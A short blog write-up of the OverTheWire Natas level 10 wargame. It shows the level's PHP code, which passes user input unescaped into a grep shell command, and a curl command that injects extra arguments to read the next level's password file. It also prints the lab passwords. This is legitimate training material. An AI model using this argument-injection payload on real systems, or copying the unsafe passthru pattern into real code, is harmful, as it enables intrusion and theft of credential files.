Natas [Level 10] - Overthewire

Posted Jan 24, 2023 Updated Aug 6, 2024

Natas teaches the basics of serverside web-security.

By Dat Vu 2k

1 min read

Username: natas10
Password: D44EcsFkLxPIkAAKLosx8z3hxX1Z4MCE
URL: http://natas10.natas.labs.overthewire.org

This level is similar to the previous level, so let’s view the sourcecode and see what i can find in the PHP script.

  
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>

Hmm… same level 9, check query with character

  
curl -XPOST -u natas10:D44EcsFkLxPIkAAKLosx8z3hxX1Z4MCE -d "needle=.* /etc/natas_webpass/natas11 #" -d "submit="  http://natas10.natas.labs.overthewire.org

Alright, i got the password! Moving on to level 11!

==> CTF: { natas11:1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg }

CTF-AnonOps, Natas

overthewire natas

This post is licensed under CC BY 4.0 by the author.

Natas [Level 10] - Overthewire

Further Reading

Natas [Level 0] - Overthewire

Natas [Level 1] - Overthewire

Natas [Level 2] - Overthewire